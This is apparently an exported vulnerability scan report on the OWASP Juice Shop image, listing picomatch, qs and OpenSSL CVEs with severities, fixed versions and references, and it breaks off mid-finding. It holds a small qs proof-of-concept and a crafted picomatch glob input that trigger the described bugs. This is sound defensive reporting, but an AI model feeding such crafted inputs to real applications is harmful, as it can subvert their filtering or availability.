Picomatch is a glob matcher written JavaScript. Versions prior to +4.0.4, 3.0.2, and 2.3.2 are vulnerable to a method injection +vulnerability affecting the POSIX_REGEX_SOURCE object. Because the object inherits from Object.prototype, specially crafted POSIX bracket expressions (e.g., [[:constructor:]]) + can reference inherited method names. These methods are implicitly +converted to strings and injected into the generated regular expression. + This leads to incorrect glob matching behavior (integrity impact), +where patterns may match unintended filenames. The issue does not enable + remote code execution, but it can cause security-relevant logic errors +in applications that rely on glob matching for filtering, validation, or + access control. All users of affected picomatch versions +that process untrusted or user-controlled glob patterns are potentially +impacted. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users + should upgrade to one of these versions or later, depending on their +supported release line. If upgrading is not immediately possible, avoid +passing untrusted glob patterns to picomatch. Possible mitigations +include sanitizing or rejecting untrusted glob patterns, especially +those containing POSIX character classes like [[:...:]]; avoiding the use of POSIX bracket expressions if user input is involved; and manually patching the library by modifying POSIX_REGEX_SOURCE to use a null prototype.

+ + +
Mitigation
+

4.0.4, 3.0.2, 2.3.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33672
+https://github.com/micromatch/picomatch
+https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903
+https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p
+https://nvd.nist.gov/vuln/detail/CVE-2026-33672
+https://www.cve.org/CVERecord?id=CVE-2026-33672

+ + + + + + + +
+
+
+
+ Finding 184: CVE-2025-15284 Qs 6.13.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 20 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
qs6.13.0
+ + + + + + + +
File Path
juice-shop/node_modules/qs/package.json
+
+
+
+ + + + + +
Description
+

qs: qs: Denial of Service via improper input validation in array parsing
+Target: Node.js
+Type: node-pkg
+Fixed version: 6.14.1

+

Improper Input Validation vulnerability in qs (parse modules) allows HTTP DoS.This issue affects qs: < 6.14.1.

+

Summary

+

The arrayLimit option in qs did not enforce limits for bracket +notation (a[]=1&a[]=2), only for indexed notation (a[0]=1). This is a + consistency bug; arrayLimit should apply uniformly across all +array notations.

+

Note: The default parameterLimit of 1000 effectively +mitigates the DoS scenario originally described. With default options, +bracket notation cannot produce arrays larger than +parameterLimit regardless of arrayLimit, because each +a[]=valueconsumes one parameter slot. The severity has been reduced +accordingly.

+

Details

+

The arrayLimit option only checked limits for indexed notation +(a[0]=1&a[1]=2) but did not enforce it for bracket notation +(a[]=1&a[]=2).

+

Vulnerable code (lib/parse.js:159-162):

+

if (root === '[]' && options.parseArrays) {
+ obj = utils.combine([], leaf); // No arrayLimit check
+}

+

Working code (lib/parse.js:175):

+

else if (index <= options.arrayLimit) { // Limit checked here
+ obj = [];
+ obj[index] = leaf;
+}

+

The bracket notation handler at line 159 uses utils.combine([], +leaf) without validating against options.arrayLimit, while indexed +notation at line 175 checks index <= options.arrayLimit before +creating arrays.

+

PoC

+

const qs = require('qs');
+const result = qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6', { arrayLimit: 5 });
+console.log(result.a.length); // Output: 6 (should be max 5)

+

Note on parameterLimit interaction: The original advisory's "DoS + demonstration" claimed a length of 10,000, but +parameterLimit (default: 1000) caps parsing to 1,000 parameters. +With default options, the actual output is 1,000, not 10,000.

+

Impact

+

Consistency bug in arrayLimit enforcement. With default +parameterLimit, the practical DoS risk is negligible since +parameterLimit already caps the total number of parsed parameters +(and thus array elements from bracket notation). The risk increases only + when parameterLimit is explicitly set to a very high value.

+ + +
Mitigation
+

6.14.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2025-15284
+https://github.com/ljharb/qs
+https://github.com/ljharb/qs/commit/3086902ecf7f088d0d1803887643ac6c03d415b9
+https://github.com/ljharb/qs/security/advisories/GHSA-6rw7-vpxm-498p
+https://nvd.nist.gov/vuln/detail/CVE-2025-15284
+https://www.cve.org/CVERecord?id=CVE-2025-15284

+ + + + + + + +
+
+
+
+ Finding 57: CVE-2025-68160 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 787 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

openssl: OpenSSL: Denial of Service due to out-of-bounds write in BIO filter
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.18-1~deb12u2

+

Issue summary: Writing large, newline-free data into a BIO chain using the
+line-buffering filter where the next BIO performs short writes can trigger
+a heap-based out-of-bounds write.

+

Impact summary: This out-of-bounds write can cause memory corruption which
+typically results in a crash, leading to Denial of Service for an application.

+

The line-buffering BIO filter (BIO_f_linebuffer) is not used by default in
+TLS/SSL data paths. In OpenSSL command-line applications, it is typically
+only pushed onto stdout/stderr on VMS systems. Third-party applications that
+explicitly use this filter with a BIO chain that can short-write and that
+write large, newline-free data influenced by an attacker would be affected.
+However, the circumstances where this could happen are unlikely to be under
+attacker control, and BIO_f_linebuffer is unlikely to be handling non-curated
+data controlled by an attacker. For that reason the issue was assessed as
+Low severity.

+

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,
+as the BIO implementation is outside the OpenSSL FIPS module boundary.

+

OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.

+ + +
Mitigation
+

3.0.18-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:1473
+https://access.redhat.com/security/cve/CVE-2025-68160
+https://bugzilla.redhat.com/2430375
+https://bugzilla.redhat.com/2430376
+https://bugzilla.redhat.com/2430377
+https://bugzilla.redhat.com/2430378
+https://bugzilla.redhat.com/2430379
+https://bugzilla.redhat.com/2430380
+https://bugzilla.redhat.com/2430381
+https://bugzilla.redhat.com/2430386
+https://bugzilla.redhat.com/2430387
+https://bugzilla.redhat.com/2430388
+https://bugzilla.redhat.com/2430389
+https://bugzilla.redhat.com/2430390
+https://bugzilla.redhat.com/show_bug.cgi?id=2430375
+https://bugzilla.redhat.com/show_bug.cgi?id=2430376
+https://bugzilla.redhat.com/show_bug.cgi?id=2430377
+https://bugzilla.redhat.com/show_bug.cgi?id=2430378
+https://bugzilla.redhat.com/show_bug.cgi?id=2430379
+https://bugzilla.redhat.com/show_bug.cgi?id=2430380
+https://bugzilla.redhat.com/show_bug.cgi?id=2430381
+https://bugzilla.redhat.com/show_bug.cgi?id=2430386
+https://bugzilla.redhat.com/show_bug.cgi?id=2430387
+https://bugzilla.redhat.com/show_bug.cgi?id=2430388
+https://bugzilla.redhat.com/show_bug.cgi?id=2430389
+https://bugzilla.redhat.com/show_bug.cgi?id=2430390
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796
+https://errata.almalinux.org/9/ALSA-2026-1473.html
+https://errata.rockylinux.org/RLSA-2026:1473
+https://github.com/advisories/GHSA-g78j-46j5-97cr
+https://github.com/openssl/openssl/commit/384011202af92605d926fafe4a0bcd6b65d162ad
+https://github.com/openssl/openssl/commit/475c466ef2fbd8fc1df6fae1c3eed9c813fc8ff6
+https://github.com/openssl/openssl/commit/4c96fbba618e1940f038012506ee9e21d32ee12c
+https://github.com/openssl/openssl/commit/6845c3b6460a98b1ec4e463baa2ea1a63a32d7c0
+https://github.com/openssl/openssl/commit/68a7cd2e2816c3a02f4d45a2ce43fc04fac97096
+https://linux.oracle.com/cve/CVE-2025-68160.html
+https://linux.oracle.com/errata/ELSA-2026-50081.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-68160
+https://openssl-library.org/news/secadv/20260127.txt
+https://ubuntu.com/security/notices/USN-7980-1
+https://ubuntu.com/security/notices/USN-7980-2
+https://www.cve.org/CVERecord?id=CVE-2025-68160

+ + + + + + + +
+
+
+
+ Finding 58: CVE-2025-69418 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 325 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

+ + +
Description
+

openssl: OpenSSL: Information disclosure and data tampering via specific low-level OCB encryption/decryption calls
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.18-1~deb12u2

+

Issue summary: When using the low-level OCB API directly with AES-NI or
other hardware-accelerated code paths, inputs whose length is not a multiple
of 16 bytes can leave the final partial block unencrypted and unauthenticated.

Impact summary: The trailing 1-15 bytes of a message may be exposed in
cleartext on encryption and are not covered by the authentication tag,
allowing an attacker to read or tamper with those bytes without detection.

The low-level OCB encrypt and decrypt routines in the hardware-accelerated
stream path process full 16-byte blocks but do not advance the input/output
pointers. The subsequent tail-handling code then operates on the original
base pointers, effectively reprocessing the beginning of the buffer while
leaving the actual trailing bytes unprocessed. The authentication checksum
also excludes the true tail bytes.

However, typical OpenSSL consumers using EVP are not affected because the
higher-level EVP and provider OCB implementations split inputs so that full
blocks and trailing partial blocks are processed in separate calls, avoiding
the problematic code path. Additionally, TLS does not use OCB ciphersuites.
The vulnerability only affects applications that call the low-level
CRYPTO_ocb128_encrypt() or CRYPTO_ocb128_decrypt() functions directly with
non-block-aligned lengths in a single call on hardware-accelerated builds.
For these reasons the issue was assessed as Low severity.

The FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected
by this issue, as OCB mode is not a FIPS-approved algorithm.

OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue.

OpenSSL 1.0.2 is not affected by this issue.

+ + +
Mitigation
+

3.0.18-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:1473
+https://access.redhat.com/security/cve/CVE-2025-69418
+https://bugzilla.redhat.com/2430375
+https://bugzilla.redhat.com/2430376
+https://bugzilla.redhat.com/2430377
+https://bugzilla.redhat.com/2430378
+https://bugzilla.redhat.com/2430379
+https://bugzilla.redhat.com/2430380
+https://bugzilla.redhat.com/2430381
+https://bugzilla.redhat.com/2430386
+https://bugzilla.redhat.com/2430387
+https://bugzilla.redhat.com/2430388
+https://bugzilla.redhat.com/2430389
+https://bugzilla.redhat.com/2430390
+https://bugzilla.redhat.com/show_bug.cgi?id=2430375
+https://bugzilla.redhat.com/show_bug.cgi?id=2430376
+https://bugzilla.redhat.com/show_bug.cgi?id=2430377
+https://bugzilla.redhat.com/show_bug.cgi?id=2430378
+https://bugzilla.redhat.com/show_bug.cgi?id=2430379
+https://bugzilla.redhat.com/show_bug.cgi?id=2430380
+https://bugzilla.redhat.com/show_bug.cgi?id=2430381
+https://bugzilla.redhat.com/show_bug.cgi?id=2430386
+https://bugzilla.redhat.com/show_bug.cgi?id=2430387
+https://bugzilla.redhat.com/show_bug.cgi?id=2430388
+https://bugzilla.redhat.com/show_bug.cgi?id=2430389
+https://bugzilla.redhat.com/show_bug.cgi?id=2430390
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796
+https://errata.almalinux.org/9/ALSA-2026-1473.html
+https://errata.rockylinux.org/RLSA-2026:1473
+https://github.com/advisories/GHSA-78qr-24v5-7q73
+https://github.com/openssl/openssl/commit/372fc5c77529695b05b4f5b5187691a57ef5dffc
+https://github.com/openssl/openssl/commit/4016975d4469cd6b94927c607f7c511385f928d8
+https://github.com/openssl/openssl/commit/52d23c86a54adab5ee9f80e48b242b52c4cc2347
+https://github.com/openssl/openssl/commit/a7589230356d908c0eca4b969ec4f62106f4f5ae
+https://github.com/openssl/openssl/commit/ed40856d7d4ba6cb42779b6770666a65f19cb977
+https://linux.oracle.com/cve/CVE-2025-69418.html
+https://linux.oracle.com/errata/ELSA-2026-50081.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-69418
+https://openssl-library.org/news/secadv/20260127.txt
+https://ubuntu.com/security/notices/USN-7980-1
+https://ubuntu.com/security/notices/USN-7980-2
+https://www.cve.org/CVERecord?id=CVE-2025-69418

+ + + + + + + +
+
+
+
+ Finding 59: CVE-2025-69420 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 754 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

openssl: OpenSSL: Denial of Service via malformed TimeStamp Response
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.18-1~deb12u2

+

Issue summary: A type confusion vulnerability exists in the TimeStamp Response
+verification code where an ASN1_TYPE union member is accessed without first
+validating the type, causing an invalid or NULL pointer dereference when
+processing a malformed TimeStamp Response file.

+

Impact summary: An application calling TS_RESP_verify_response() with a
+malformed TimeStamp Response can be caused to dereference an invalid or
+NULL pointer when reading, resulting in a Denial of Service.

+

The functions ossl_ess_get_signing_cert() and ossl_ess_get_signing_cert_v2()
+access the signing cert attribute value without validating its type.
+When the type is not V_ASN1_SEQUENCE, this results in accessing invalid memory
+through the ASN1_TYPE union, causing a crash.

+

Exploiting this vulnerability requires an attacker to provide a malformed
+TimeStamp Response to an application that verifies timestamp responses. The
+TimeStamp protocol (RFC 3161) is not widely used and the impact of the
+exploit is just a Denial of Service. For these reasons the issue was
+assessed as Low severity.

+

The FIPS modules in 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,
+as the TimeStamp Response implementation is outside the OpenSSL FIPS module
+boundary.

+

OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue.

+

OpenSSL 1.0.2 is not affected by this issue.

+ + +
Mitigation
+

3.0.18-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:1473
+https://access.redhat.com/security/cve/CVE-2025-69420
+https://bugzilla.redhat.com/2430375
+https://bugzilla.redhat.com/2430376
+https://bugzilla.redhat.com/2430377
+https://bugzilla.redhat.com/2430378
+https://bugzilla.redhat.com/2430379
+https://bugzilla.redhat.com/2430380
+https://bugzilla.redhat.com/2430381
+https://bugzilla.redhat.com/2430386
+https://bugzilla.redhat.com/2430387
+https://bugzilla.redhat.com/2430388
+https://bugzilla.redhat.com/2430389
+https://bugzilla.redhat.com/2430390
+https://bugzilla.redhat.com/show_bug.cgi?id=2430375
+https://bugzilla.redhat.com/show_bug.cgi?id=2430376
+https://bugzilla.redhat.com/show_bug.cgi?id=2430377
+https://bugzilla.redhat.com/show_bug.cgi?id=2430378
+https://bugzilla.redhat.com/show_bug.cgi?id=2430379
+https://bugzilla.redhat.com/show_bug.cgi?id=2430380
+https://bugzilla.redhat.com/show_bug.cgi?id=2430381
+https://bugzilla.redhat.com/show_bug.cgi?id=2430386
+https://bugzilla.redhat.com/show_bug.cgi?id=2430387
+https://bugzilla.redhat.com/show_bug.cgi?id=2430388
+https://bugzilla.redhat.com/show_bug.cgi?id=2430389
+https://bugzilla.redhat.com/show_bug.cgi?id=2430390
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796
+https://errata.almalinux.org/9/ALSA-2026-1473.html
+https://errata.rockylinux.org/RLSA-2026:1473
+https://github.com/advisories/GHSA-w42r-ph9f-9x66
+https://github.com/openssl/openssl/commit/27c7012c91cc986a598d7540f3079dfde2416eb9
+https://github.com/openssl/openssl/commit/4e254b48ad93cc092be3dd62d97015f33f73133a
+https://github.com/openssl/openssl/commit/564fd9c73787f25693bf9e75faf7bf6bb1305d4e
+https://github.com/openssl/openssl/commit/5eb0770ffcf11b785cf374ff3c19196245e54f1b
+https://github.com/openssl/openssl/commit/a99349ebfc519999edc50620abe24d599b9eb085
+https://linux.oracle.com/cve/CVE-2025-69420.html
+https://linux.oracle.com/errata/ELSA-2026-50081.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-69420
+https://openssl-library.org/news/secadv/20260127.txt
+https://ubuntu.com/security/notices/USN-7980-1
+https://ubuntu.com/security/notices/USN-7980-2
+https://www.cve.org/CVERecord?id=CVE-2025-69420

+ + + + + + + +
+
+
+
+ Finding 60: CVE-2025-9230 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 125 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

+ + +
Description
+

openssl: Out-of-bounds read & write in RFC 3211 KEK Unwrap
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.17-1~deb12u3

+

Issue summary: An application trying to decrypt CMS messages encrypted using
+password based encryption can trigger an out-of-bounds read and write.

+

Impact summary: This out-of-bounds read may trigger a crash which leads to
+Denial of Service for an application. The out-of-bounds write can cause
+a memory corruption which can have various consequences including
+a Denial of Service or Execution of attacker-supplied code.

+

Although the consequences of a successful exploit of this vulnerability
+could be severe, the probability that the attacker would be able to
+perform it is low. Besides, password based (PWRI) encryption support in CMS
+messages is very rarely used. For that reason the issue was assessed as
+Moderate severity according to our Security Policy.

+

The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this
+issue, as the CMS implementation is outside the OpenSSL FIPS module
+boundary.

+ + +
Mitigation
+

3.0.17-1~deb12u3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

http://www.openwall.com/lists/oss-security/2025/09/30/5
+https://access.redhat.com/errata/RHSA-2026:2776
+https://access.redhat.com/security/cve/CVE-2025-9230
+https://bugzilla.redhat.com/2396054
+https://bugzilla.redhat.com/show_bug.cgi?id=2396054
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-9230
+https://errata.almalinux.org/9/ALSA-2026-2776.html
+https://errata.rockylinux.org/RLSA-2025:21255
+https://github.com/openssl/openssl/commit/5965ea5dd6960f36d8b7f74f8eac67a8eb8f2b45
+https://github.com/openssl/openssl/commit/9e91358f365dee6c446dcdcdb01c04d2743fd280
+https://github.com/openssl/openssl/commit/a79c4ce559c6a3a8fd4109e9f33c1185d5bf2def
+https://github.com/openssl/openssl/commit/b5282d677551afda7d20e9c00e09561b547b2dfd
+https://github.com/openssl/openssl/commit/bae259a211ada6315dc50900686daaaaaa55f482
+https://github.openssl.org/openssl/extended-releases/commit/c2b96348bfa662f25f4fabf81958ae822063dae3
+https://github.openssl.org/openssl/extended-releases/commit/dfbaf161d8dafc1132dd88cd48ad990ed9b4c8ba
+https://linux.oracle.com/cve/CVE-2025-9230.html
+https://linux.oracle.com/errata/ELSA-2026-50114.html
+https://lists.debian.org/debian-lts-announce/2025/10/msg00001.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-9230
+https://openssl-library.org/news/secadv/20250930.txt
+https://ubuntu.com/security/notices/USN-7786-1
+https://www.cve.org/CVERecord?id=CVE-2025-9230

+ + + + + + + +
+
+
+
+ Finding 61: CVE-2026-22795 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 754 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

openssl: OpenSSL: Denial of Service due to type confusion in PKCS#12 file processing
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.18-1~deb12u2

+

Issue summary: An invalid or NULL pointer dereference can happen in
+an application processing a malformed PKCS#12 file.

+

Impact summary: An application processing a malformed PKCS#12 file can be
+caused to dereference an invalid or NULL pointer on memory read, resulting
+in a Denial of Service.

+

A type confusion vulnerability exists in PKCS#12 parsing code where
+an ASN1_TYPE union member is accessed without first validating the type,
+causing an invalid pointer read.

+

The location is constrained to a 1-byte address space, meaning any
+attempted pointer manipulation can only target addresses between 0x00 and 0xFF.
+This range corresponds to the zero page, which is unmapped on most modern
+operating systems and will reliably result in a crash, leading only to a
+Denial of Service. Exploiting this issue also requires a user or application
+to process a maliciously crafted PKCS#12 file. It is uncommon to accept
+untrusted PKCS#12 files in applications as they are usually used to store
+private keys which are trusted by definition. For these reasons, the issue
+was assessed as Low severity.

+

The FIPS modules in 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,
+as the PKCS12 implementation is outside the OpenSSL FIPS module boundary.

+

OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue.

+

OpenSSL 1.0.2 is not affected by this issue.

+ + +
Mitigation
+

3.0.18-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:1473
+https://access.redhat.com/security/cve/CVE-2026-22795
+https://bugzilla.redhat.com/2430375
+https://bugzilla.redhat.com/2430376
+https://bugzilla.redhat.com/2430377
+https://bugzilla.redhat.com/2430378
+https://bugzilla.redhat.com/2430379
+https://bugzilla.redhat.com/2430380
+https://bugzilla.redhat.com/2430381
+https://bugzilla.redhat.com/2430386
+https://bugzilla.redhat.com/2430387
+https://bugzilla.redhat.com/2430388
+https://bugzilla.redhat.com/2430389
+https://bugzilla.redhat.com/2430390
+https://bugzilla.redhat.com/show_bug.cgi?id=2430375
+https://bugzilla.redhat.com/show_bug.cgi?id=2430376
+https://bugzilla.redhat.com/show_bug.cgi?id=2430377
+https://bugzilla.redhat.com/show_bug.cgi?id=2430378
+https://bugzilla.redhat.com/show_bug.cgi?id=2430379
+https://bugzilla.redhat.com/show_bug.cgi?id=2430380
+https://bugzilla.redhat.com/show_bug.cgi?id=2430381
+https://bugzilla.redhat.com/show_bug.cgi?id=2430386
+https://bugzilla.redhat.com/show_bug.cgi?id=2430387
+https://bugzilla.redhat.com/show_bug.cgi?id=2430388
+https://bugzilla.redhat.com/show_bug.cgi?id=2430389
+https://bugzilla.redhat.com/show_bug.cgi?id=2430390
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796
+https://errata.almalinux.org/9/ALSA-2026-1473.html
+https://errata.rockylinux.org/RLSA-2026:1473
+https://github.com/advisories/GHSA-3vqq-45qg-2xf6
+https://github.com/openssl/openssl/commit/2502e7b7d4c0cf4f972a881641fe09edc67aeec4
+https://github.com/openssl/openssl/commit/572844beca95068394c916626a6d3a490f831a49
+https://github.com/openssl/openssl/commit/7bbca05be55b129651d9df4bdb92becc45002c12
+https://github.com/openssl/openssl/commit/eeee3cbd4d682095ed431052f00403004596373e
+https://github.com/openssl/openssl/commit/ef2fb66ec571564d64d1c74a12e388a2a54d05d2
+https://linux.oracle.com/cve/CVE-2026-22795.html
+https://linux.oracle.com/errata/ELSA-2026-50081.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-22795
+https://openssl-library.org/news/secadv/20260127.txt
+https://ubuntu.com/security/notices/USN-7980-1
+https://ubuntu.com/security/notices/USN-7980-2
+https://www.cve.org/CVERecord?id=CVE-2026-22795

+ + + + + + + +
+
+
+
+ Finding 62: CVE-2026-22796 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 754 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
